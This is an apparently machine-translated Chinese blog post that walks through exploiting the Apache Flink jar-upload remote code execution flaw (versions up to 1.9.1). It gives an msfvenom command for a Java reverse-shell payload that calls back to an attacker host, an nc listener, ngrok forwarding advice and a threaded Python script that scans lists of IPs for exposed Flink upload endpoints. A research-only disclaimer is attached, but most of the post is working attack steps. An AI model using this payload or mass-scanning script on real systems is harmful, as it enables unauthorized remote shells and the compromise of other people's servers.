Foreword
Remember once Apache Flink Jar package upload any cause remote code execution vulnerability reproduction process.
Has been committed to the vulnerability of small white reproduction process can understand and appreciate the support you all the way since!
Acknowledgments Cx01, prime minister and other cousin who. Without your help, there is no article!
0x01 Vulnerability Description
Recently, a security researcher discloses a Apache Flink Jar package upload any loopholes lead to remote code execution.
Sphere of influence: <= 1.9.1 (the latest version)
I may be measured relatively small, the probability of success of version 1.9 is relatively high.
0x02 vulnerability threat level
高危
It can lead to remote code execution
0x03 reproducible vulnerability
The first step in generating payload msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar
name can be arbitrarily taken
The second step is generated monitor port, I chose nc listening port.
nc -lvp 8000
The third step is to upload payload
The last direct return shell
Then execute the command
0x04 reproducible those pit
一定要生成公网ip的payload!!!
一定要生成公网ip的payload!!!
一定要生成公网ip的payload!!!
No money, little brother, little sister can select a Sunny-ngrok tool for port forwarding.
Sunny-ngrok official tutorial
0x05 batch testing script
Script Source
""" auth: @l3_W0ng version: 1.0 function: Apache Web Dashboard RCE usage: python3 script.py ip [port [command]] default port=8081 """ import os import subprocess import requests from multiprocessing.dummy import Pool as ThreadPool def get_iplist(): iplist = [] with open("iplist.txt", 'r') as file: data = file.readlines() for item in data: ip = item.strip() iplist.append(ip) return iplist def check_8081(ip): url = 'http://' + ip + ':8081/jar/upload' try: res = requests.get(url=url, timeout=2) data = { 'msg': res.json(), 'state': 1, 'url': url, 'ip': ip } except: data = { 'msg': 'Secure', 'state': 0, 'ip': ip } if data['state'] == 1: print(data) if __name__ == '__main__': iplist = get_iplist() pool = ThreadPool(20) pool.map(check_8081, iplist)
Ps:
当注释掉 if ‘Unable to load requested file’ in str(data):
之后,出现Token为空,或者 Unauthorized request 时候是不存在未授权访问的,而是带授权
部分exp代码
0x06 参考文献
https://www.t00ls.net/thread-53784-1-1.html
https://mp.weixin.qq.com/s/ArYCF4jjhy6nkY4ypib-Ag
https://flink.apache.org/downloads.html
0x07 免责声明
0x05批量脚本是来自于https://www.t00ls.net/thread-53784-1-1.html,如果有侵犯权益,留言删除。大佬见谅!
本文中提到的漏洞利用Poc和脚本仅供研究学习使用,请遵守《网络安全法》等相关法律法规。
————————————————
版权声明:本文为CSDN博主「清水samny」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/sun1318578251/article/details/103056168